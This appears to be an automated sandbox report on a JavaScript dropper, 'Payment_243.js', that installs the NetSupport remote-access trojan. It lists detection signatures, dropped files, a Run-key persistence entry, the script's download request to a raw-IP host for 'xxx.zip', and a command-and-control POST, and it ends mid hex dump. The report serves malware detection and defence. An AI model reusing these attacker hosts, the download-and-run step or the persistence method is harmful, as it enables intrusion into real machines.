Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_243.js

Overview

General Information

Sample name:Payment_243.js
Analysis ID:1591023
MD5:19cef6a2f4055703922f3e8fd2c92fb9
SHA1:e6ccef88b3cbba0424a39edab01697716fd8d813
SHA256:d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Deletes itself after installation
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: DNS Query To Remote Access Software Domain From Non-Browser App
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to disable installed Antivirus / HIPS / PFW
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w7x64
  • wscript.exe (PID: 3592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js" MD5: 045451FA238A75305CC26AC982472367)
    • client32.exe (PID: 3968 cmdline: "C:\ProgramData\i99ekubc\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\i99ekubc\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\ProgramData\i99ekubc\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\i99ekubc\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\i99ekubc\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\ProgramData\i99ekubc\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000004.00000002.644043633.0000000001F93000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 4 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      4.2.client32.exe.72b40000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        4.2.client32.exe.73620000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          4.2.client32.exe.a10000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            4.0.client32.exe.a10000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              4.2.client32.exe.111b8c68.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                                Click to see the 4 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3592, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\i99ekubc\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3592, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)
                                Sigma detected: DNS Query To Remote Access Software Domain From Non-Browser App
                                Source: DNS queryAuthor: frack113, Connor Martin: Data: Image: C:\ProgramData\i99ekubc\client32.exe, QueryName: geo.netsupportsoftware.com
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3592, ProcessName: wscript.exe
                                Sigma detected: Modification of IE Registry Settings
                                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3592, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-01-14T16:25:36.126119+010018100041Potentially Bad Traffic192.168.2.224916345.155.249.21580TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\ProgramData\i99ekubc\HTCTL32.DLLReversingLabs: Detection: 15%
                                Source: C:\ProgramData\i99ekubc\PCICHEK.DLLReversingLabs: Detection: 18%
                                Source: C:\ProgramData\i99ekubc\PCICL32.DLLReversingLabs: Detection: 18%
                                Source: C:\ProgramData\i99ekubc\client32.exeReversingLabs: Detection: 31%
                                Source: C:\ProgramData\i99ekubc\pcicapi.dllReversingLabs: Detection: 15%
                                Source: C:\ProgramData\i99ekubc\remcmdstub.exeReversingLabs: Detection: 28%
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110ADA40
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\PROGRA~3\i99ekubc\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000004.00000002.644430314.0000000069DB1000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.644485160.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.644466466.0000000072B45000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior

                                Software Vulnerabilities

                                barindex
                                JavaScript source code contains functionality to generate code involving a shell, file or stream
                                Source: Payment_243.jsArgument value : ['"WScript.Shell"']
                                Source: Payment_243.jsArgument value : ['"Shell.Application"', '"WScript.Shell"']
                                Source: Payment_243.jsArgument value : ['"Shell.Application"', '"WScript.Shell"', '"Scripting.FileSystemObject"']
                                Source: Payment_243.jsArgument value : ['"Shell.Application"', '"WScript.Shell"', '"Scripting.FileSystemObject"']

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.22:49163 -> 45.155.249.215:80
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.155.249.215 80Jump to behavior
                                JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
                                Source: Payment_243.jsArgument value : ['"GET","http://45.155.249.215/xxx.zip?mt=6364",false']
                                Source: Payment_243.jsArgument value : ['"GET","http://45.155.249.215/xxx.zip?mt=6364",false']
                                Source: Payment_243.jsArgument value : ['"MSXML2.XMLHTTP"']
                                Source: Payment_243.jsArgument value : ['"MSXML2.XMLHTTP"']
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 172.67.68.212 172.67.68.212
                                Source: Joe Sandbox ViewIP Address: 172.67.68.212 172.67.68.212
                                Source: Joe Sandbox ViewASN Name: MEER-ASmeerfarbigGmbHCoKGDE MEER-ASmeerfarbigGmbHCoKGDE
                                Source: global trafficHTTP traffic detected: GET /xxx.zip?mt=6364 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.155.249.215Connection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Tue, 14 Jan 2025 15:25:36 GMTContent-Type: application/zipContent-Length: 2845498Connection: keep-aliveLast-Modified: Mon, 13 Jan 2025 16:08:22 GMTETag: "2b6b3a-62b98a754cee9"Accept-Ranges: bytesData Raw: 50 4b 03 04 0a 00 00 00 00 00 44 77 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 69 6e 73 74 61 6c 6c 2f 50 4b 03 04 14 00 00 00 08 00 0b 50 29 5a 14 81 51 7e 86 b5 00 00 7c b5 00 00 19 00 00 00 69 6e 73 74 61 6c 6c 2f 35 42 38 46 45 42 32 41 46 38 31 37 34 39 33 45 73 00 05 80 fa 7f 54 44 46 24 51 72 4c 00 00 00 b5 60 88 47 af 1c 6c 35 ca ca 04 4a ee 30 0b ac fc 54 a5 52 80 93 43 4f 67 b0 e8 c6 b3 c1 a1 91 b9 e6 b0 db 7f 3a ed 1f 97 37 3c 2d 12 23 9a 03 a0 82 51 20 90 c6 b0 1d 28 dc 14 8f fa 4d 65 17 fa 2e bd 9a 1b 49 df 54 25 51 81 a0 e5 e3 c9 7d 48 92 3b c0 c1 12 bd 33 4b df 7f 70 4d ec ab 00 6a 2b 1d 0d 4a 4a ac bb 29 9d 51 7e dd e3 78 3f d4 f6 44 c4 65 d3 f9 26 7e c5 a4 cb 66 92 18 15 e3 07 28 f4 6e 21 9f 76 0e 33 83 6f 05 6a f0 f7 f1 25 7b f8 13 9d e3 c3 62 a1 d8 a2 d1 3e 0c 9d 79 11 10 09 de 7a c7 88 00 c4 9b a4 91 db a9 9b 0e 8a 99 90 7a 0d 00 de ac 45 3e 0d 8d a6 e7 f8 f0 48 4a 44 ff 41 c2 5d d2 ff 79 dc 7b 7e 86 77 78 a6 08 5e 55 f9 3c b4 77 ca 4c 83 b5 7e aa c9 6a 16 d5 5b a8 68 3c 3a 02 2c cf 10 8a 62 b0 99 16 dd a8 dd bb 79 62 12 9c 92 85 59 06 be d8 60 59 e3 f2 30 c1 46 aa 00 fa 8f 59 9d eb de 5c 85 0e 15 d1 9b 9d ae fc 46 4a e9 1c 83 15 63 ac 9c 98 84 7b 80 9a 6e 65 9e f5 21 1b e2 38 39 15 d1 e5 5a 05 19 f2 f4 a4 11 8d 61 2a 73 69 9e b5 ee 0a aa a6 c7 bd 0d 5d b3 ca 1b ea 4e a3 4d e1 44 79 3b 52 44 5b ae fe 89 6d 23 3f 0b de 5c e7 20 64 bd 1b c2 8a ba 9f ec e6 f5 77 f7 84 54 d5 b8 50 a8 08 12 60 47 06 93 fe 56 86 a0 71 c2 50 64 89 bf 67 bb fc 20 38 5b 88 08 c7 0a 32 5e 1e 90 7e 34 23 5e e8 a3 82 6b ff 89 53 8a 35 fb a4 e5 7b 7b ca 29 57 c8 32 7f 26 19 ee 50 97 47 31 4c 5e 59 af 27 b7 51 18 d6 74 2f 83 f4 05 7e 23 7e 7a c8 39 a8 05 86 3a 8e cb f4 ed c3 3b 74 95 08 49 f2 c3 03 62 e9 85 67 64 20 e8 1e e2 54 0a 83 0a ba 23 c1 a9 d7 0e f0 3f 41 09 ee d2 7e ef 66 dd 25 b4 d7 55 e3 08 ee 42 cf 2f fa d0 88 a3 9e d4 f5 c1 b8 c4 67 3f 37 64 e9 97 24 b3 29 d3 d6 c7 ad c1 f8 7b 42 85 1e 23 cb 45 19 f4 08 92 34 f7 4e 07 b5 18 8c 3a fb de 13 6d 4d ca 5d 97 4c 44 77 a6 43 cc 41 9b 37 ee ab 7a 8f e9 29 52 e7 71 69 2d c1 b3 6a d9 af 7e 33 45 c2 03 b8 07 65 2b 18 71 32 ad b9 9f 7d 27 f4 7b a5 f9 22 27 80 57 b9 0e 14 08 e0 7b 5d 7c f6 67 4b 0e f2 8a 79 41 db f8 3b b4 78 dc 32 e2 9a 0c 59 e4 cb 78 d4 05 69 50 d8 9d 4a d9 49 8d ba fb 04 5d f9 f4 e1 fe b1 16 d9 dc bf 3b 80 c4 54 4b 81 ff 25 f1 b1 62 14 84 98 7a ee 2b 1f 61 83 bb 90 8b 51 f2 d9 c5 24 f1 84 e6 72 d7 4d 4e 4c b3 d5 c3 40 ac 53 ae 34 3b fe 12 98 61 eb 8d a3 6e ba 4f 6d 3d ad ea 02 82 6f 43 6d 2c 60 6f 86 b3 bc 51 f3 28 14 0c a9 dc f5 ec 26 fd 70 0d 54 f0 59 0b 9c ff df fd 1a bb ae e3 f7 70 ca 84 07 3c 61 e9 23 78 d2 68 51 c8 43 11 4e 22 69 75 88 bd 66 99 cd 41 c6 23 fd ee 43 53 96 34 33 4e 0f ed 74 ad 48 63 67 07
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xxx[1].zipJump to behavior
                                Source: global trafficHTTP traffic detected: GET /xxx.zip?mt=6364 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.155.249.215Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://185.157.213.71/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.157.213.71Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:25:50 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901ea414fa9c41de-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1a0Dx0OGKXHyff4tWOx9huhmxu%2FrfpGODYCY3eCxDk%2BoYOYnaiuMoMz%2Felupk%2BTzjfpiLGxRUjNSSN2%2FaPZ1njy6u0TbmV5Jr%2BA1HNDIEKeTAseAOqNo1O6%2BgdO6dLvCRsR6g%2Fy2fdL0D0%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1577&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 